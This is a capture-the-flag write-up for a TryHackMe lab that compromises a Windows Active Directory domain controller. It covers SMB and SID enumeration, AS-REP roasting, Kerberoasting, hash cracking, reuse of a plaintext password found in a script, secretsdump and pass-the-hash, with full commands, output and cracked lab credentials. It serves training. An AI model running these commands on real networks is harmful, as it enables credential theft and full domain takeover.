Challenge description
https://tryhackme.com/room/vulnnetroasted
Reconnaissance / Enumeration
Port scanning and service identification
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
$ rustscan -a $ip -r 1-65535 -- -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[...]
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2022-01-15 03:43:28Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
49665/tcp open unknown syn-ack
49667/tcp open unknown syn-ack
49669/tcp open unknown syn-ack
49670/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open unknown syn-ack
49689/tcp open unknown syn-ack
49705/tcp open unknown syn-ack
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 10257/tcp): CLEAN (Timeout)
| Check 2 (port 45437/tcp): CLEAN (Timeout)
| Check 3 (port 14149/udp): CLEAN (Timeout)
| Check 4 (port 19319/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-15T03:44:06
|_ start_date: N/A
|_clock-skew: 0s```
$ nmap -n -sV --script "ldap* and not brute" -p 389 $ip -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-15 04:41 UTC
Nmap scan report for 10.10.229.96
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=vulnnet-rst,DC=local
| ldapServiceName: vulnnet-rst.local:win-2bo8m1oe1m1$@VULNNET-RST.LOCAL
[...]
| dsServiceName: CN=NTDS Settings,CN=WIN-2BO8M1OE1M1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=vulnnet-rst,DC=local
| dnsHostName: WIN-2BO8M1OE1M1.vulnnet-rst.local
| defaultNamingContext: DC=vulnnet-rst,DC=local
| currentTime: 20220115044146.0Z
|_ configurationNamingContext: CN=Configuration,DC=vulnnet-rst,DC=local
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Our target is a DC for domain vulnnet-rst.local
Let’s move on to services enumeration
SMB Enumeration
We start by enumerating Samba shares
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
$ smbmap -u "guest" -p "" -P 445 -H $ip
[+] IP: 10.10.229.96:445 Name: 10.10.229.96
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
$ smbclient //$ip/VulnNet-Enterprise-Anonymous
Enter WORKGROUP\h3x's password:
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \Enterprise-Operations.txt of size 467 as Enterprise-Operations.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \Enterprise-Safety.txt of size 503 as Enterprise-Safety.txt (0.4 KiloBytes/sec) (average 0.5 KiloBytes/sec)
getting file \Enterprise-Sync.txt of size 496 as Enterprise-Sync.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
$ smbclient //$ip/VulnNet-Business-Anonymous
Enter WORKGROUP\h3x's password:
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \Business-Manager.txt of size 758 as Business-Manager.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \Business-Sections.txt of size 654 as Business-Sections.txt (0.5 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \Business-Tracking.txt of size 471 as Business-Tracking.txt (0.4 KiloBytes/sec) (average 0.3 KiloBytes/sec)
$ cat *.txt
[...]
Alexa Whitehat is our core business manager. All business-related offers, campaigns, and advertisements should be directed to her.
[...]
Jack Goldenhand is the person you should reach to for any business unrelated proposals.
[...]
Tony Skid is a core security manager and takes care of internal infrastructure.
[...]
Johnny Leet keeps the whole infrastructure up to date and helps you sync all of your apps.
[...]
Active Directory Enumeration
Text files we got from the open shares gives us the name of some employees. Let’s try to make ourselves a custom user lists and test them out:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ cat << EOF >> customusers.txt
alexawhitehat
jackgoldenhand
tonyskid
johnnyleet
alexa
awhitehat
alexa.whitehat
jack
jgoldenhand
jack.goldenhand
tony
tskid
tony.skid
johnny
jleet
johnny.leet
whitehat
goldenhand
skid
leet
EOF
$ kerbrute userenum --dc $ip -d $dom ./customusers.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 01/15/22 - Ronnie Flathers @ropnop
2022/01/15 18:54:22 > Using KDC(s):
2022/01/15 18:54:22 > 10.10.247.181:88
2022/01/15 18:54:23 > Done! Tested 20 usernames (0 valid) in 0.692 seconds
No luck :(
Next, we use Impacket’s lookupsid.py to enumerate SIDs on the domain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
$ lookupsid.py anonymous@$ip -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.247.181
[*] StringBinding ncacn_np:10.10.247.181[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
$ cat << EOF > customusers.txt
a-whitehat
t-skid
j-goldenhand
j-leet
enterprise-core-vn
EOF
$ kerbrute userenum --dc $ip -d $dom ./customusers.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 01/15/22 - Ronnie Flathers @ropnop
2022/01/15 18:55:29 > Using KDC(s):
2022/01/15 18:55:29 > 10.10.247.181:88
2022/01/15 18:55:29 > [+] VALID USERNAME: a-whitehat@vulnnet-rst.local
2022/01/15 18:55:29 > [+] VALID USERNAME: j-goldenhand@vulnnet-rst.local
2022/01/15 18:55:29 > [+] VALID USERNAME: enterprise-core-vn@vulnnet-rst.local
2022/01/15 18:55:29 > [+] VALID USERNAME: t-skid@vulnnet-rst.local
2022/01/15 18:55:29 > [+] VALID USERNAME: j-leet@vulnnet-rst.local
2022/01/15 18:55:29 > Done! Tested 25 usernames (5 valid) in 0.771 seconds
With a list of 5 valid usern, and judging by the name of the challenge, we will now try to roast this machine.
Exploitation && Foothold
ASREPRoast
From our list of users, we’re gonna try to find an “ASREPRoastable” victim
1
2
3
4
5
6
7
8
9
10
$ GetNPUsers.py -usersfile ./customusers.txt -format hashcat -outputfile hashes.asreproast -dc-ip $ip $dom/
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
& cat hashes.asreproast
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:61c29c8ea1dbcec71d69893539932bbda5[...]fd269eab3058
We have our ASREPRoastable user, let’s try and crack the hash
1
2
3
$ hashcat -m 18200 --force -a 0 hashes.asreproast /opt/wordlists/rockyou.txt
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:61c29c8ea1dbce3[...]15d018b2f3058:tj072889*
With that credentials in hand, we should be able to find a Kerberoastable user
Kerberoast
We start by using t-skid’s credentials to search for a victim
1
2
$ GetUserSPNs.py -dc-ip $ip -outputfile ./kerberoast.hashes -usersfile ./customusers.txt $dom/t-skid:tj072889* && cat kerberoast.hashes
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$enterprise-core-vn*$e7984c52a33e14a7c47dd3e8bf723e46$60c20d75bd82b2b0d1b6d516b06ca[...]2d1104f
We can now crack the password
1
2
3
$ hashcat -m 13100 --force -a 0 ./kerberoast.hashes /opt/wordlists/rockyou.txt
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$enterprise-core-vn*$a7a1[...]60ca62:ry=ibfkfv,s6h,
Privilege Escalation
Let’s do an authenticated share enumeration
1
2
3
4
5
6
7
8
9
10
11
$ smbmap -u enterprise-core-vn -p 'ry=ibfkfv,s6h,' -P 445 -H $ip
[+] IP: 10.10.95.159:445 Name: vulnnet-rst.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
We have read access on netlogon:
1
2
3
4
5
6
7
8
9
10
11
$ smbclient -U enterprise-core-vn //$ip/NETLOGON
Enter WORKGROUP\enterprise-core-vn's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 16 23:15:49 2021
.. D 0 Tue Mar 16 23:15:49 2021
ResetPassword.vbs A 2821 Tue Mar 16 23:18:14 2021
8771839 blocks of size 4096. 4519613 blocks available
smb: \> get ResetPassword.vbs
getting file \ResetPassword.vbs of size 2821 as ResetPassword.vbs (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
Inside NETLOGON we find a vbs script with a username and password in it. Let’s try it out
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
$ cat ResetPassword.vbs
Option Explicit
Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName
[...]
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
[...]
$ evil-winrm -i $ip -u a-whitehat -p bNdKVkjv3RR9ht
*Evil-WinRM* PS C:\Users\a-whitehat\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\a-whitehat\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Domain Admins Group S-1-5-21-1589833671-435344116-4136949213-512 Mandatory group, Enabled by default, Enabled group
VULNNET-RST\Denied RODC Password Replication Group Alias S-1-5-21-1589833671-435344116-4136949213-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
So we are domain admin, nice !
Let use Impacket’s secretsdump.py to.. you guessed it, dump secrets !
1
2
3
4
5
6
7
8
$ secretsdump.py vulnnet-rst/a-whitehat:bNdKVkjv3RR9ht@10.10.150.73
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Use administrator’s hash to do a pass-the-hash attack
1
2
3
4
5
6
$ evil-winrm -i $ip -u administrator -H c2597747aa5e43022a3a3049a3c3b09d
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> more ..\desktop\system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}
Thanks for reading <3
h3x